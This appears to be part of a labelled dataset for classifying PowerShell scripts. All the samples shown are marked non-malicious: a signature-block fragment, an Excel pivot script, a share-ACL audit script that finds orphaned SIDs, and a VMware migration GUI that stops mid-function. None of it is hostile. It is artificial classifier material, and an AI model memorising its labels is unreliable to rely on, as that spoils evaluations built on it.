J81N5XESOSSlQVaH/7xVFA8lyonux5fl0hP/PX4aoI8/yCzXo3DQx2DA/Ng+UeeX # xj477c94vorK48Typ6ftnq4IAo+gUttyHtU7w02fjvqbcMf4479sP5Kb5Dc+7GqM # KfnBor+LPhppZvscY08mAckCxD7S/8NDqBv9mfrUvKW54pMvOwHF0fQ6L2jD4GS3 # WpVeRswHg2m7PAWSVnM1c0WYTnzYEqW3QumiY/ZCYBhw0TtvMcCHx+Zx4fNGFun1 # uHKz6W0fYiZJo0mL3WjHi2hW9978+ockuAOBF4/l8WdqHa7TdPeMpV2zC45CKZbO # ScR3fmZ8ARcabBQkw7AXdwXYGkC3hmvY5HtArH7fTm8k+SCAgowz5+X6Kdid2otw # XSvJHYJMC2fLhEGe5wZ+EYNELYoZ7vR/mt15HDcZHp8/jCm6DVwQhjdsSM1FXc1w # vLzRTV3Yxbh2MYIWPjCCFjoCAQEwgZAwfDELMAkGA1UEBhMCR0IxGzAZBgNVBAgT # EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMP # U2VjdGlnbyBMaW1pdGVkMSQwIgYDVQQDExtTZWN0aWdvIFJTQSBDb2RlIFNpZ25p # bmcgQ0ECEAregRTXZ5sGby2y39L2esIwDQYJYIZIAWUDBAIBBQCgfDAQBgorBgEE # AYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3 # AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgyqGSjrf+isNuD3b6 # j3VWYtuuDTxof45oA3yzSMkz+oYwDQYJKoZIhvcNAQEBBQAEggGAXnNcOjRn7EYd # z7o3IfnH17msBhbM3N3v/jz/D5TXkk57oIdI7EbkOpwqTtcQYCJKtuIaR1YCqLK1 # 4sQJcF1nUfqUjkLKwtoAVEcFFggcDyhGXuVbr97Crf8GNPbOoj4bJnRuKnvOII8E # wYrM7JmG7YNgZsXjvkZDOCp4XlrQ6kLq8xpdjxechvI12i3RIk+xLVAGD5s04HXw # m0AZTy/pVQAJixagh3GdJ4GtQLCy3tBKcOR8VaWbGDLAGD1PjzswdfaShWIKg+ch # ay/bYlHITPTeZNGqv4QZxmcRRHSFqALQ8SNrO9UzpqImQgRS6VXDD9VMWDO0T6rr # iz0r8BFn0roq9OemDSssXbtDBpRbFCRrWrc6PV1yjfnfNyWvoWtSDgUkr8SOOygu # gKwF2FhbGPlmgSaF1b3ZkaqofXfqplz2ve5xwqRQrQDBSN7iftqbmOcmyzScp7Cw # iTZgMoFAa/nVoX0flAWc+358cq1rQ80gZ5DwyV8o5uYt+MVm51lNoYITgDCCE3wG # CisGAQQBgjcDAwExghNsMIITaAYJKoZIhvcNAQcCoIITWTCCE1UCAQMxDzANBglg # hkgBZQMEAgIFADCCAQ0GCyqGSIb3DQEJEAEEoIH9BIH6MIH3AgEBBgorBgEEAbIx # AgEBMDEwDQYJYIZIAWUDBAIBBQAEIKuZUsy1HwRkDoKT60YM4CB3Dbjt8a4ZAty4 # C6JDWX1LAhUAjntQ2OxA+AHawcBMYVwct6JFzvsYDzIwMjExMDI3MTIxMDE2WqCB # iqSBhzCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3Rl # cjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSww # KgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjMqCCDfsw # ggcHMIIE76ADAgECAhEAjHegAI/00bDGPZ86SIONazANBgkqhkiG9w0BAQwFADB9 # MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD # VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT # HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjAxMDIzMDAwMDAwWhcN # MzIwMTIyMjM1OTU5WjCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIg # TWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBM # aW1pdGVkMSwwKgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25l # ciAjMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJGHSyyLwfEeoJ7T # B8YBylKwvnl5XQlmBi0vNX27wPsn2kJqWRslTOrvQNaafjLIaoF9tFw+VhCBNToi # Noz7+CAph6x00BtivD9khwJf78WA7wYc3F5Ok4e4mt5MB06FzHDFDXvsw9njl+nL # GdtWRWzuSyBsyT5s/fCb8Sj4kZmq/FrBmoIgOrfv59a4JUnCORuHgTnLw7c6zZ9Q # BB8amaSAAk0dBahV021SgIPmbkilX8GJWGCK7/GszYdjGI50y4SHQWljgbz2H6p8 # 18FBzq2rdosggNQtlQeNx/ULFx6a5daZaVHHTqadKW/neZMNMmNTrszGKYogwWDG # 8gIsxPnIIt/5J4Khg1HCvMmCGiGEspe81K9EHJaCIpUqhVSu8f0+SXR0/I6uP6Vy # 9MNaAapQpYt2lRtm6+/a35Qu2RrrTCd9TAX3+CNdxFfIJgV6/IEjX1QJOCpi1arK # 3+3PU6sf9kSc1ZlZxVZkW/eOUg9m/Jg/RAYTZG7p4RVgUKWx7M+46MkLvsWE990K # ndq8KWw9Vu2/eGe2W8heFBy5r4Qtd6L3OZU3b05/HMY8BNYxxX7vPehRfnGtJHQb # LNz5fKrvwnZJaGLVi/UD3759jg82dUZbk3bEg+6CviyuNxLxvFbD5K1Dw7dmll6U # Mvqg9quJUPrOoPMIgRrRRKfM97gxAgMBAAGjggF4MIIBdDAfBgNVHSMEGDAWgBQa # ofhhGSAPw0F3RSiO0TVfBhIEVTAdBgNVHQ4EFgQUaXU3e7udNUJOv1fTmtufAdGu # 3tAwDgYDVR0PAQH/BAQDAgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYI # KwYBBQUHAwgwQAYDVR0gBDkwNzA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcC # ARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwRAYDVR0fBD0wOzA5oDegNYYzaHR0 # cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3Js # MHQGCCsGAQUFBwEBBGgwZjA/BggrBgEFBQcwAoYzaHR0cDovL2NydC5zZWN0aWdv # LmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3J0MCMGCCsGAQUFBzABhhdo # dHRwOi8vb2NzcC5zZWN0aWdvLmNvbTANBgkqhkiG9w0BAQwFAAOCAgEASgN4kEIz # 7Hsagwk2M5hVu51ABjBrRWrxlA4ZUP9bJV474TnEW7rplZA3N73f+2Ts5YK3lcxX # VXBLTvSoh90ihaZXu7ghJ9SgKjGUigchnoq9pxr1AhXLRFCZjOw+ugN3poICkMIu # k6m+ITR1Y7ngLQ/PATfLjaL6uFqarqF6nhOTGVWPCZAu3+qIFxbradbhJb1FCJeA # 11QgKE/Ke7OzpdIAsGA0ZcTjxcOl5LqFqnpp23WkPnlomjaLQ6421GFyPA6FYg2g # XnDbZC8Bx8GhxySUo7I8brJeotD6qNG4JRwW5sDVf2gaxGUpNSotiLzqrnTWgufA # iLjhT3jwXMrAQFzCn9UyHCzaPKw29wZSmqNAMBewKRaZyaq3iEn36AslM7U/ba+f # XwpW3xKxw+7OkXfoIBPpXCTH6kQLSuYThBxN6w21uIagMKeLoZ+0LMzAFiPJkeVC # A0uAzuRN5ioBPsBehaAkoRdA1dvb55gQpPHqGRuAVPpHieiYgal1wA7f0GiUeaGg # no62t0Jmy9nZay9N2N4+Mh4g5OycTUKNncczmYI3RNQmKSZAjngvue76L/Hxj/5Q # uHjdFJbeHA5wsCqFarFsaOkq5BArbiH903ydN+QqBtbD8ddo408HeYEIE/6yZF7p # sTzm0Hgjsgks4iZivzupl1HMx0QygbKvz98wggbsMIIE1KADAgECAhAwD2+s3WaY # dHypRjaneC25MA0GCSqGSIb3DQEBDAUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRo # ZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0 # aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xOTA1MDIwMDAwMDBaFw0zODAxMTgyMzU5 # NTlaMH0xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIx # EDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDElMCMG # A1UEAxMcU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBDQTCCAiIwDQYJKoZIhvcN # AQEBBQADggIPADCCAgoCggIBAMgbAa/ZLH6ImX0BmD8gkL2cgCFUk7nPoD5T77Na # wHbWGgSlzkeDtevEzEk0y/NFZbn5p2QWJgn71TJSeS7JY8ITm7aGPwEFkmZvIavV # cRB5h/RGKs3EWsnb111JTXJWD9zJ41OYOioe/M5YSdO/8zm7uaQjQqzQFcN/nqJc # 1zjxFrJw06PE37PFcqwuCnf8DZRSt/wflXMkPQEovA8NT7ORAY5unSd1VdEXOzQh # e5cBlK9/gM/REQpXhMl/VuC9RpyCvpSdv7QgsGB+uE31DT/b0OqFjIpWcdEtlEzI # jDzTFKKcvSb/01Mgx2Bpm1gKVPQF5/0xrPnIhRfHuCkZpCkvRuPd25Ffnz82Pg4w # ZytGtzWvlr7aTGDMqLufDRTUGMQwmHSCIc9iVrUhcxIe/arKCFiHd6QV6xlV/9A5 # VC0m7kUaOm/N14Tw1/AoxU9kgwLU++Le8bwCKPRt2ieKBtKWh97oaw7wW33pdmmT # IBxKlyx3GSuTlZicl57rjsF4VsZEJd8GEpoGLZ8DXv2DolNnyrH6jaFkyYiSWcuo # RsDJ8qb/fVfbEnb6ikEk1Bv8cqUUotStQxykSYtBORQDHin6G6UirqXDTYLQjdpr # t9v3GEBXc/Bxo/tKfUU2wfeNgvq5yQ1TgH36tjlYMu9vGFCJ10+dM70atZ2h3pVB # eqeDAgMBAAGjggFaMIIBVjAfBgNVHSMEGDAWgBRTeb9aqitKz1SA4dibwJ3ysgNm # yzAdBgNVHQ4EFgQUGqH4YRkgD8NBd0UojtE1XwYSBFUwDgYDVR0PAQH/BAQDAgGG # MBIGA1UdEwEB/wQIMAYBAf8CAQAwEwYDVR0lBAwwCgYIKwYBBQUHAwgwEQYDVR0g # BAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBDoEGGP2h0dHA6Ly9jcmwudXNlcnRy # dXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZpY2F0aW9uQXV0aG9yaXR5LmNybDB2 # BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQudXNlcnRydXN0 # LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENBLmNydDAlBggrBgEFBQcwAYYZaHR0 # cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG9w0BAQwFAAOCAgEAbVSBpTNd # FuG1U4GRdd8DejILLSWEEbKw2yp9KgX1vDsn9FqguUlZkClsYcu1UNviffmfAO9A # w63T4uRW+VhBz/FC5RB9/7B0H4/GXAn5M17qoBwmWFzztBEP1dXD4rzVWHi/SHbh # RGdtj7BDEA+N5Pk4Yr8TAcWFo0zFzLJTMJWk1vSWVgi4zVx/AZa+clJqO0I3fBZ4 # OZOTlJux3LJtQW1nzclvkD1/RXLBGyPWwlWEZuSzxWYG9vPWS16toytCiiGS/qhv # WiVwYoFzY16gu9jc10rTPa+DBjgSHSSHLeT8AtY+dwS8BDa153fLnC6NIxi5o8JH # HfBd1qFzVwVomqfJN2Udvuq82EKDQwWli6YJ/9GhlKZOqj0J9QVst9JkWtgqIsJL # nfE5XkzeSD2bNJaaCV+O/fexUpHOP4n2HKG1qXUfcb9bQ11lPVCBbqvw0NP8srMf # tpmWJvQ8eYtcZMzN7iea5aDADHKHwW5NWtMe6vBE5jJvHOsXTpTDeGUgOw9Bqh/p # oUGd/rG4oGUqNODeqPk85sEwu8CgYyz8XBYAqNDEf+oRnR4GxqZtMl20OAkrSQeq # /eww2vGnL8+3/frQo4TZJ577AWZ3uVYQ4SBuxq6x+ba6yDVdM3aO8XwgDCp3rrWi # Aoa6Ke60WgCxjKvj+QrJVF3UuWp0nr1IrpgxggQtMIIEKQIBATCBkjB9MQswCQYD # VQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdT # YWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMTHFNlY3Rp # Z28gUlNBIFRpbWUgU3RhbXBpbmcgQ0ECEQCMd6AAj/TRsMY9nzpIg41rMA0GCWCG # SAFlAwQCAgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZI # hvcNAQkFMQ8XDTIxMTAyNzEyMTAxNlowPwYJKoZIhvcNAQkEMTIEMEi3FAjfTnFT # 5bPosmVdZNOI/ixIXL78SGuAXDsfezpE1hvbQGde8CtjZlTsvDqmpzCB7QYLKoZI # hvcNAQkQAgwxgd0wgdowgdcwFgQUlRE3EB2ILzG9UT+UmtpMaK2MCPUwgbwEFALW # W5Xig3DBVwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEG # A1UECBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoT # FVRoZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBD # ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG # 9w0BAQEFAASCAgA/BbfH6gAvgfrjmIi0VW+bl/wZxXSngbM1hBXElXjECzzf+uSM # p/mA8Dy1UEw7Ecq43CW43kd2lPO/Qp4B7AUc0GzyvW18w0d9yYZ0cnDQRk8zeDO2 # +bvyjDwTutnb4sw2iMX/plusn6JyCZnzsyFJSXH45L69zKKjiJLptZXM+78N27Sh # oo1HBjVZcLqm/uatJWVQLTWgMvC/zFu9hT0TVFlvKsNtJVMOV5UUOBpqsPd/vLD8 # LmLyZj5rQ9fnYUWmAyx6W4HTGCherxHJBEGrHPIc8xks25wsnIsr+QGB9d0nq9DY # 0ySxVa93AxNyybxR/fIrO2fg942xRphkjxL3PQ/vdG0LAR3rkqUO4Emlg6KodflN # 7slnl+yKbdcYS6NUcd23xxh5sri7RI9dJ8chXenxNC4cEtUV7CTC/V8F/YciFxFV # u6Pur25E1ZqvZxenWylO77UZQ5hIVYtehr5ereJ6rhXh4jOQnf83cjXWX0HDkdq2 # XpLzbB1NywDefKL+dnOVimZy0An7DOIR15fxynIfyAmJWMZtFOQ9QOYnRXzj+wNY # WXjhWttByutrLg/w/SovWg6htuwddcoUUgYhsQg+SauY+SM7seBpL2MVVuWYPUFJ # I+hlJkzNJ3d64sL7sI9qlbxhrBJOadG7HKnaeM9tnA7TB36QK335suEGTw== # SIG # End signature block
combined_dataset/train/non-malicious/2549.ps1
2549.ps1
cls $people = Import-Csv .\people.csv | select Dept, Name, @{ n="Salary" e={[double]$_.Salary} }, @{ n="YearsEmployeed" e={[int]$_.yearsEmployeed} } $people | .\Out-ExcelPivotTable $people | .\Out-ExcelPivotTable name dept salary $people | .\Out-ExcelPivotTable -values YearsEmployeed
combined_dataset/train/non-malicious/8097adfd-db82-4ae1-8996-c504851508d5.ps1
8097adfd-db82-4ae1-8996-c504851508d5.ps1
#========================================================================== # NAME: getunknownsids.ps1 # # AUTHOR: Stephen Wheet # Version: 4.0 # Date: 6/11/10 # # COMMENT: # This script was created to find unknown SIDs or old domain permissions # on folders. It ignores folders where inheirtance is turned on. # # This works on NETAPPS and WINDOWS servers. You will need the DLL's # # Version 2: completely changed the query method and ACL removal # Version 3: Added ability to query AD for servers, and handles getting # getting shares automatically from: # NETAPP FILERS # Windows servers # Version 4: Cleaned up folder checking and added checking for local # account checking so we could ignore. # #========================================================================== Function checkshare { Param($PassedShareName) Process { $path = "\\\\$serverFQDN\\$PassedShareName" $filename = $path.Replace("\\","-") + ".csv" #Place Headers on out-put file $list = "Task,Path,Access Entity," $list | format-table | Out-File "c:\\reports\\unknownsids\\$filename" #Populate Folders Array Write-Host "Writing results to : $filename" $date = Get-Date Write-Host $date Write-Host "Getting Folders in: $Path" #PSIscontainer means folders only [Array] $folders = Get-ChildItem -path $path -recurse | ? {$_.PSIsContainer} #Process data in array ForEach ($folder in [Array] $folders) { #Check to see if there are any folders If ($folder.pspath){ #Convert Powershell Provider Folder Path to standard folder path $PSPath = (Convert-Path $folder.pspath) Write-Host "Checking Dir: $PSPath" #Check to make sure valid If ($PSPath){ #Get the ACL's from each folder $error.clear() $acl = Get-Acl -Path $PSPath #Write log if no access if (!$?) { $errmsg = "Error,$PSPath,ACCESS DENIED" $errmsg | format-table | Out-File -append "$filename" } #end IF $ACL.Access | ?{!$_.IsInherited} | ?{ $_.IdentityReference -like $unknownsid -or $_.IdentityReference -like $olddomain } | % {$value = $_.IdentityReference.Value #Check for Local account $localsid = 0 If ($value -like $unknownsid){ $checkforlocal = $value.split("-") $total =$checkforlocal.count -1 if ($checkforlocal[$total] -match "^100.$" -or $checkforlocal[$total] -match "^500"){ $localsid = 1 # You can uncomment the below if you want to report on local accounts. #$list = ("Local,$PSPath,$value") #$list | format-table | Out-File -append "$filename" } #end IF } #end IF If (!$localsid){ Write-host "Found - $PSPath - $value" $list = ("Found,$PSPath,$value") $list | format-table | Out-File -append "$filename" #Remove Bad SID if ($removeacl) { $ACL.RemoveAccessRuleSpecific($_) Write-host "Deleting - $PSPath - $value" $list = ("Deleting,$PSPath,$value") $list | format-table | Out-File -append "$filename" }#end IF if ($removeacl -and $value) { $date = Get-Date Write-Host $date Write-host "Setting - $PSPath" $list = ("Setting,$PSPath") $list | format-table | Out-File -append "$filename" Set-ACL $PSpath $ACL $value = "" } #end IF } #end if } #end foreachobj } #end if } #end if } #end ForEach }#end Process } #end function get-pssnapin -registered | add-pssnapin -passthru [void][Reflection.Assembly]::LoadFile('C:\\reports\\ManageOntap.dll') #Need this DLL from netapp 3.5SDK $ReqVersion = [version]"1.2.2.1254" $QadVersion = (Get-PSSnapin Quest.ActiveRoles.ADManagement).Version #Need Quest plugins installed if($QadVersion -lt $ReqVersion) { throw "Quest AD cmdlets version '$ReqVersion' is required. Please download the latest version" } #end If #Set variables $value = "" $unknownsid = "*S-1-5-21-*" #Broken SID Verify the Broken SID number on your system and replace $olddomain = "Domain.local*" #Old w2k/nt4 domain $ErrorActionPreference = "SilentlyContinue" $removeacl = 0 #change to 1 if you want to remove the SID, 0 for only logging $localsid = 0 #Get all the servers from the specified OU $Servers = get-QADComputer -SearchRoot 'domain.local/ou/Server' # change the container. Foreach ($server in $Servers ) { $serverFQDN = $server.dnsname write-host $serverFQDN #Test ping server to make sure it's up before querying it $ping = new-object System.Net.NetworkInformation.Ping $Reply = $ping.Send($serverFQDN) if ($Reply.status -eq "Success"){ Write-Host "Online" #Check for Netapp .. if found get the shares differently If ($serverFQDN -like "*netapp*"){ $server = new-object netapp.manage.naserver($serverFQDN,1,0) #pass authentication $server.Style = "RPC" # Issue command to get the shares $NaElement = New-Object NetApp.Manage.NaElement("system-cli") $arg = New-Object NetApp.Manage.NaElement("args") $arg.AddNewChild('arg','cifs') $arg.AddNewChild('arg','shares') $NaElement.AddChildElement($arg) $CifsString = $server.InvokeElem($NaElement).GetChildContent("cli-output") # Split the returned txt up .. the $null makes it skip a line $null,$null,$Lines = $CifsString.Split("`n") Foreach ($line in $Lines ) { # Had to trick it so skip the line with permissions, then exclude ETC$ adn c$ if (!$line.startswith(" ") -and $line -notlike "*Etc$*" -and $line -notlike "*C$*"){ $l= $line.Split(" ") checkshare -PassedShareName $l[0] #Pass share to function } #end if } #end foreach } #end if Else{ #Else if a Windows server query via WMI Get-WMIObject Win32_Share -Computer $serverFQDN | where {$_.Name -like "*$*" -and $_.Name -notlike "*ADMIN*" -and $_.Name -notlike "*IPC*" -and $_.Name -notlike "*lib*"} | %{ #Set path $sharename = $_.name checkshare -PassedShareName $sharename #Pass share to function } #end ForEachObj } #End Else } #End If } #end ForEach
combined_dataset/train/non-malicious/Easy Migration Tool v_2.1.ps1
Easy Migration Tool v_2.1.ps1
#Generated Form Function function GenerateForm { ######################################################################## # Code Generated By: Richard Yaw # Generated On: 07/12/2011 # # Easy Migration Script for VMware (Version 2.0) # - Added a "Reload Tasks" feature. # - Fixed issue with the Undo feature for SVMotions. # - Added snapshot check before doing SVMotions. # - Added ability to VMotion VMs between clusters. # # Easy Migration Script for VMware (Version 3.0) # - Added ability to run multiple migrations concurrently. # - The UI is no longer locked during a migration. # # Easy Migration Script for VMware (Version 3.1) # - Changed GUI to make it bigger on the screen. # - When doing a Host to Host migration, you can now drill down a host to list the VMs on it. ############################################################################################# #region Import the Assemblies [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null [reflection.assembly]::loadwithpartialname("System.Windows.Forms") | Out-Null #endregion #region Generated Form Objects $MigrationForm = New-Object System.Windows.Forms.Form $Header = new-object System.Windows.Forms.Label $MigrateButton = New-Object System.Windows.Forms.Button $ClusterComboBox = New-Object System.Windows.Forms.ComboBox $SourceHostListBox = New-Object System.Windows.Forms.ListBox $SourceDBListBox = New-Object System.Windows.Forms.CheckedListBox $SourceVMListBox = New-Object System.Windows.Forms.CheckedListBox $DestinationListBox = New-Object System.Windows.Forms.ListBox $vCenterLabel = New-Object System.Windows.Forms.Label $VCComboBox = New-Object System.Windows.Forms.ComboBox $LoginButton = New-Object System.Windows.Forms.Button $ClearMsgButton = New-Object System.Windows.Forms.Button $UndoButton = New-Object System.Windows.Forms.Button $UndoALLButton = New-Object System.Windows.Forms.Button $ReloadTaskButton = New-Object System.Windows.Forms.Button $SaveTaskButton = New-Object System.Windows.Forms.Button $ClusterLabel = New-Object System.Windows.Forms.Label $HostToHostButton = New-Object System.Windows.Forms.Button $VMToHostButton = New-Object System.Windows.Forms.Button $DBtoDBButton = New-Object System.Windows.Forms.Button $VMtoDBButton = New-Object System.Windows.Forms.Button $AllClustersCheckbox = New-Object System.Windows.Forms.CheckBox $SourceButton = New-Object System.Windows.Forms.Button $DestinationButton = New-Object System.Windows.Forms.Button $FindVMLabel = New-Object System.Windows.Forms.Label $FindVMTxtBox = New-Object System.Windows.Forms.TextBox $FindVMBtn = New-Object System.Windows.Forms.Button $ResetFindVMBtn = New-Object System.Windows.Forms.Button $ResetButton = New-Object System.Windows.Forms.Button $ChangeVCButton = New-Object System.Windows.Forms.Button $CloseButton = New-Object System.Windows.Forms.Button $MessagesLabel = New-Object System.Windows.Forms.Label $MessagesListBox = New-Object System.Windows.Forms.ListBox $TaskLabel = New-Object System.Windows.Forms.Label $TaskListBox = New-Object System.Windows.Forms.ListBox $InitialFormWindowState = New-Object System.Windows.Forms.FormWindowState #endregion Generated Form Objects #---------------------------------------------- #Generated Event Script Blocks #---------------------------------------------- #Provide Custom Code for events specified in PrimalForms. $LoginButton_Click= { #TODO: Place custom script here If ((Get-PSSnapin "VMware.VimAutomation.Core" -ErrorAction SilentlyContinue) -eq $null) { Add-PSSnapin "VMware.VimAutomation.Core" } If($VCComboBox.SelectedItem -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show("Please select a vCenter Server.") } Else { #Connect to vCenter $vCenterName = $VCComboBox.SelectedItem.ToString() Connect-VIServer $vCenterName -ErrorAction SilentlyContinue If (!$?) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show($($error[0])) } Else { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show("You are now connected to $vCenterName. Please select a cluster from the drop-down box.") $ClusterComboBox.Enabled = $true #Get Cluster $ClusterNames = Get-View -ViewType ClusterComputeResource | %{$_.Name} foreach($ClusterName in $ClusterNames) { $ClusterComboBox.Items.add($ClusterName) } $LoginButton.Enabled = $false $VCComboBox.Enabled = $false $HostToHostButton.Enabled = $true $VMToHostButton.Enabled = $true $DBtoDBButton.Enabled = $true $VMtoDBButton.Enabled = $true $ResetButton.Enabled = $true $ChangeVCButton.Enabled = $true $ReloadTaskButton.Enabled = $true $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } } $HostToHostButton_Click= { #TODO: Place custom script here $ClusterName = $ClusterComboBox.SelectedItem If ($ClusterName -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Cluster.') } Else { $SourceHostListBox.Enabled = $true $SourceHostListBox.Items.Clear() #Get Hostnames in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | % { [void]$SourceHostListBox.items.add($_.Name) } $ClusterComboBox.Enabled = $false $HostToHostButton.Enabled = $false $VMToHostButton.Enabled = $false $DBtoDBButton.Enabled = $false $VMtoDBButton.Enabled = $false $SourceButton.Text = 'Source - Select One Host' $DestinationButton.Text = 'Destination Host' $SourceButton.Enabled = $true $HostToHostButton.BackColor = [System.Drawing.Color]::lightblue $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $VMToHostButton_Click= { #TODO: Place custom script here $ClusterName = $ClusterComboBox.SelectedItem If ($ClusterName -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Cluster.') } Else { $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Add($SourceVMListBox) $SourceVMListBox.Enabled = $true $SourceVMListBox.Items.Clear() #Get VMs in a Cluster Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) } $ClusterComboBox.Enabled = $false $HostToHostButton.Enabled = $false $VMToHostButton.Enabled = $false $DBtoDBButton.Enabled = $false $VMtoDBButton.Enabled = $false $SourceButton.Text = 'Source - Select VMs' $DestinationButton.Text = 'Destination Host' $SourceButton.Enabled = $true $FindVMTxtBox.Enabled = $true $FindVMBtn.Enabled = $true $ResetFindVMBtn.Enabled = $true $VMToHostButton.BackColor = [System.Drawing.Color]::lightblue $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $DBtoDBButton_Click= { #TODO: Place custom script here $ClusterName = $ClusterComboBox.SelectedItem If ($ClusterName -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Cluster.') } Else { $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Add($SourceDBListBox) $SourceDBListBox.Enabled = $true $SourceDBListBox.Items.Clear() #Get Datastores in a Cluster Get-Cluster -Name $ClusterName | Get-VMHost | Get-Datastore | Where-Object {$_.Name -notlike "*SCR01"} | Where-Object {$_.Name -notlike "DAS*"} | % { [void]$SourceDBListBox.items.add($_.Name) } $ClusterComboBox.Enabled = $false $HostToHostButton.Enabled = $false $VMToHostButton.Enabled = $false $DBtoDBButton.Enabled = $false $VMtoDBButton.Enabled = $false $SourceButton.Text = 'Source - Select a Datastore' $DestinationButton.Text = 'Destination Datastore' $SourceButton.Enabled = $true $DBtoDBButton.BackColor = [System.Drawing.Color]::lightblue $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $VMToDBButton_Click= { #TODO: Place custom script here $ClusterName = $ClusterComboBox.SelectedItem If ($ClusterName -eq $null) { [reflection.assembly]::loadwithpartialname('system.windows.forms') [system.Windows.Forms.MessageBox]::show('Please Select a Cluster.') } Else { $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Add($SourceVMListBox) $SourceVMListBox.Enabled = $true $SourceVMListBox.Items.Clear() #Get VMs in a Cluster Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) } $ClusterComboBox.Enabled = $false $HostToHostButton.Enabled = $false $VMToHostButton.Enabled = $false $DBtoDBButton.Enabled = $false $VMtoDBButton.Enabled = $false $SourceButton.Text = 'Source - Select VMs' $DestinationButton.Text = 'Destination Datastore' $SourceButton.Enabled = $true $FindVMTxtBox.Enabled = $true $FindVMBtn.Enabled = $true $ResetFindVMBtn.Enabled = $true $VMtoDBButton.BackColor = [System.Drawing.Color]::lightblue $OnLoadForm_StateCorrection= {#Correct the initial state of the form to prevent the .Net maximized form issue $MigrationForm.WindowState = $InitialFormWindowState } } } $SourceHostListBox_MouseDoubleClick= { #TODO: Place custom script here $SourceHostname = $SourceHostListBox.SelectedItem If ($SourceHostname -ne $null) { $MigrationForm.Controls.Remove($SourceHostListBox) $MigrationForm.Controls.Add($SourceVMListBox) $SourceVMListBox.Enabled = $true $SourceVMListBox.Items.Clear() Get-VMHost -name $SourceHostname | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) } 